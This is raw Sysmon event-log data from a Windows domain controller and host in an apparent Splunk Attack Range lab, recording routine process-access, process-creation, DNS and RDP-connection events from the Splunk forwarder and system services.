09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3D00-00000000FD01}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CD1-6151-3700-00000000FD01}34803484C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD1-6151-3D00-00000000FD01}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.999{5EBD8912-8CD1-6151-3D00-00000000FD01}3652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 354300x8000000000000000980526Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:15.440{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55040-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980525Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:18.184{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1C647C5CCB626C9CFF477F62A41FBA,SHA256=2754786D7FCAFD9D19D611767F2CD880BFB86707053C32BE385229C7DAC06802,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001053787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.551{5EBD8912-8CBD-6151-0B00-00000000FD01}640win-dc-429010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001053786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.549{5EBD8912-8CD0-6151-2800-00000000FD01}2200win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000001053785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD3-6151-5000-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD3-6151-5000-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CD3-6151-4F00-00000000FD01}35083532C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD3-6151-5000-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.978{5EBD8912-8CD3-6151-5000-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD3-6151-4F00-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000001053772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD3-6151-4F00-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM3